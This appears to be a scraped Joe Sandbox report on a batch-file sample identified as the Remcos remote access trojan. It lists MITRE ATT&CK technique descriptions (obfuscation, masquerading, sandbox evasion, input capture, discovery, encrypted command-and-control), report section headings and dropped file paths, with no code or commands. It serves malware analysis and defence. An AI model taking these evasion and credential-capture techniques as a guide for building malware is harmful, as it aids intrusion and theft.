Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 55Ka50lb6Z.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\428c6e6

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gl5lkjwh.ens.psm1

Windows Analysis Report
55Ka50lb6Z.bat

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre